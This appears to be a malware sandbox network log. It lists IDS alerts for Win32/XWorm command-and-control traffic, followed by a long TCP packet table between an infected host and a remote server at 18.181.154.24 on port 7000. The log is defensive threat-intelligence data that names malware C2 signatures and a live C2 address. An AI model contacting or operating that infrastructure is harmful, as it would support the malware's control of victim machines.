2024-11-25T06:26:18.498577+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49735 | 18.181.154.24 | 7000 | TCP
2024-11-25T06:26:43.062445+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:43.062445+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:13.042930+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:13.042930+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:43.059424+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:43.059424+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:28:13.069282+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:28:13.069282+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 06:25:04.539885998 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:04.660733938 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:04.660821915 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:04.789459944 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:04.908958912 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:13.034497023 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:13.078707933 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:15.971535921 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:16.091023922 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:27.157812119 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:27.277409077 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:38.328963995 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:38.449665070 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:43.034631968 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:25:43.079014063 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:49.500915051 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:25:49.620454073 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:00.672759056 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:00.793092012 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:11.843012094 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:11.962661982 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:12.501064062 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:12.621624947 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:13.077925920 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:13.125720024 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:13.910507917 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:14.030282974 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:14.236398935 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:14.355921984 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:15.465199947 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:15.584654093 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:17.013791084 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:17.134289026 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:17.639235020 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:17.758727074 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:18.328562975 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:18.448131084 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:18.498577118 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:18.618113041 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:18.919617891 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:19.039146900 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:20.376848936 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:20.496408939 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:20.594681978 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:20.714198112 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:20.948312998 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:21.068171978 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:22.202737093 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:22.322249889 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:23.250905037 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:23.370415926 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:23.480904102 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:23.600447893 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:23.842911005 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:23.962388992 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:24.495065928 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
Nov 25, 2024 06:26:24.614653111 CET | 7000 | 49735 | 18.181.154.24 | 192.168.2.4
Nov 25, 2024 06:26:24.641725063 CET | 49735 | 7000 | 192.168.2.4 | 18.181.154.24
                                                                      Nov 25, 2024 06:26:24.761255980 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:24.899239063 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:25.018928051 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:26.370874882 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:26.490319967 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:26.579186916 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:26.698949099 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:27.121141911 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:27.240650892 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:28.501075983 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:28.620534897 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:28.620579958 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:28.740019083 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:28.740065098 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:28.859523058 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:28.861455917 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:28.980885029 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:29.391524076 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:29.510940075 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:29.510997057 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:29.630549908 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:30.092673063 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:30.212223053 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:30.453452110 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:30.572977066 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:30.573040009 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:30.692529917 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:30.996746063 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:31.116173983 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:31.116225004 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:31.235692024 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:31.972037077 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:32.091836929 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:32.767123938 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:32.886625051 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:33.783098936 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:33.902551889 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:34.650451899 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:34.769946098 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:35.768724918 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:35.888187885 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:36.552536964 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:36.672039032 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:36.717119932 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:36.836565971 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:38.337352037 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:38.456907988 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:38.762598038 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:38.882169008 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:39.146228075 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:39.265671015 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:40.384027958 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:40.503541946 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:41.844691992 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:41.964189053 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:42.711765051 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:42.831217051 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:42.846760035 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:42.966232061 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:43.062444925 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:43.126116991 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:45.744128942 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:45.864340067 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:49.010361910 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:49.129796028 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:49.406291008 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:49.525752068 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:50.040954113 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:50.160837889 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:50.276277065 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:50.395672083 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:52.738598108 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:52.860261917 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:53.424002886 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:53.544265032 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:53.561726093 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:53.681238890 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:53.706079006 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:53.825586081 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:53.964457989 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:54.083878994 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:54.417567968 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:54.536988974 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:54.618047953 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:54.737500906 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:55.388859034 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:55.508281946 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:55.508393049 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:55.813292027 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:55.836466074 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:55.897330999 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:55.932910919 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:56.016765118 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:56.016824007 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:56.136240005 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:56.766634941 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:56.886209011 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:56.948126078 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:57.067743063 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:57.414226055 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:57.533710957 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:58.366482973 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:58.485866070 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:58.485912085 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:58.605340958 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:58.768022060 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:58.887502909 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:58.887557983 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:59.007131100 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:59.020275116 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:59.139872074 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:26:59.139919043 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:26:59.259398937 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:01.094100952 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:01.213643074 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:01.213692904 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:01.333286047 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:02.330389023 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:02.449914932 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:02.450102091 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:02.569600105 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:03.129297972 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:03.248832941 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:03.249013901 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:03.368527889 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:04.333843946 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:04.453485012 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:04.453530073 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:04.573137045 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:04.710663080 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:04.830426931 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:04.906608105 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:05.026051998 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:06.630211115 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:06.749717951 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:06.956479073 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:07.076184034 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:07.115693092 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:07.236215115 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:08.283662081 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:08.403295994 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:08.403350115 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:08.522860050 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:08.522924900 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:08.645967007 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:08.752549887 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:08.872035980 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:08.872078896 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:08.991542101 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:09.028405905 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:09.147924900 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:10.352473021 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:10.472038031 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:10.531306028 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:10.650813103 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:10.692250013 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:10.813982964 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:13.042929888 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:13.096208096 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:13.216098070 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:13.240355968 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:13.360207081 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:14.506359100 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:14.625860929 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:14.625900030 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:14.745337009 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:16.891777992 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:17.011197090 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:17.011259079 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:17.130747080 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:17.245749950 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:17.365287066 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:18.374696970 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:18.494266033 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:18.745460987 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:18.865112066 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:18.865169048 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:18.984832048 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:18.984903097 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:19.104679108 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:20.666589975 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:20.786058903 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:20.786101103 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:20.905550957 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:21.101103067 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:21.220732927 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:21.220774889 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:21.340328932 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:21.340415001 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:21.459923029 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:22.301995993 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:22.421478987 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:22.421569109 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:22.541057110 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:24.278655052 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:24.398171902 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:24.401694059 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:24.521202087 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:24.521275043 CET497357000192.168.2.418.181.154.24
                                                                      Nov 25, 2024 06:27:24.640721083 CET70004973518.181.154.24192.168.2.4
                                                                      Nov 25, 2024 06:27:24.640789986 CET497357000192.168.2.418.181.154.24
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 25, 2024 06:27:24.760361910 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:24.760438919 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:24.879885912 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:25.376178026 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:25.495759964 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:26.404266119 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:26.523719072 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:26.523768902 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:26.643388033 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:26.643435955 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:26.762876987 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:26.762945890 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:26.884213924 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:28.404161930 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:28.523662090 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:28.523714066 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:28.643177986 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:28.643228054 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:28.762819052 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:28.775510073 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:28.895131111 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:28.895237923 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:29.014756918 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:29.216566086 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:29.336024046 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:30.342334986 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:30.461853027 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:30.471885920 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:30.592156887 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:31.204499006 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:31.326035023 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:32.298310995 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:32.417965889 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:32.418014050 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:32.537478924 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:34.753030062 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:34.872560978 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:35.152327061 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:35.272381067 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:35.272430897 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:35.393043041 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:36.394630909 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:36.514101028 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:37.150705099 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:37.270358086 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:37.270396948 CET  49735        7000       192.168.2.4    18.181.154.24
